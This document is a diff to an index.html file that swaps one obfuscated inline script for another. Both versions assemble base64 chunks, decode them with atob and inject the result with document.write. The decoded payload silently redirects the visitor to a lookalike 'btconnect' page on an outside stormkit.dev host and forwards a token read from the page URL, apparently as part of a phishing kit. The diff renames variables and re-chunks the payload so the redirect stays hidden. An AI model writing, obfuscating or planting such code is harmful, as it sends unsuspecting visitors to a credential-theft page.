--- a/index.html
+++ b/index.html
@@ -8,15 +8,15 @@
         
     <script>
         (function() {
-            const NWLdj92E = [
-                'PHNjcmlwdD4KCXdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKAoJICAiaHR0c', 'HM6Ly9idGNvbm5lY3QtbGIzOTNhYzE5MGNmYTJmYTBlYzBhOTVlNWQwYz', 'YzY2YxODRhOTgzYzRkOGVhZGZiYWNlLnN0b3Jta2l0LmRldi9idC5odG1', 'sLz9jbGllbnQ9Vzk1NUxBQTFHaVJkVDd6NE81a2JwOWdnYldGekdWRkRM', 'UjY1OFRWOWNsdmhKVGNQeVV3VjRvTlB6SHZFOUZtNk1sRHk5SUpVdWh5N', '2lDSGh2TktTem43N0RHbnh6VmxsQ1AzazU3Mk9TUEpNMVQzNjEzWExWME', '1BWTM5OCMiICsKCQlhdG9iKG5ldyBVUkxTZWFyY2hQYXJhbXMod2luZG9', '3LmxvY2F0aW9uLnNlYXJjaCkuZ2V0KCJ0b2tlbiIpKQoJKTsKICA8L3Nj', 'cmlwdD4='
+            const Gj0N4Bo2 = [
+                'PHNjcmlwdD4KCXdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKAoJI', 'CAiaHR0cHM6Ly9idGNvbm5lY3QtbGIzOTNhYzE5MGNmYTJmYT', 'BlYzBhOTVlNWQwYzYzY2YxODRhOTgzYzRkOGVhZGZiYWNlLnN', '0b3Jta2l0LmRldi9idC5odG1sP2NsaWVudD1XOTU1TEFBMUdp', 'UmRUN3o0TzVrYnA5Z2diV0Z6R1ZGRExSNjU4VFY5Y2x2aEpUY', '1B5VXdWNG9OUHpIdkU5Rm02TWxEeTlJSlV1aHk3aUNIaHZOS1', 'N6bjc3REdueHpWbGxDUDNrNTcyT1NQSk0xVDM2MTNYTFYwTUF', 'ZMzk4IyIgKwoJCWF0b2IobmV3IFVSTFNlYXJjaFBhcmFtcyh3', 'aW5kb3cubG9jYXRpb24uc2VhcmNoKS5nZXQoInRva2VuIikpC', 'gkpOwogIDwvc2NyaXB0Pg=='
             ];
-            let 7iocJIsv = "";
-            for (let chunk of NWLdj92E) {
-                7iocJIsv += chunk;
+            let j1dD6q0Z = "";
+            for (let chunk of Gj0N4Bo2) {
+                j1dD6q0Z += chunk;
             }
-            const uKhOj8Fh = atob(7iocJIsv);
-            document.write(uKhOj8Fh);
+            const MIEQiY8S = atob(j1dD6q0Z);
+            document.write(MIEQiY8S);
         })();
     </script>
     
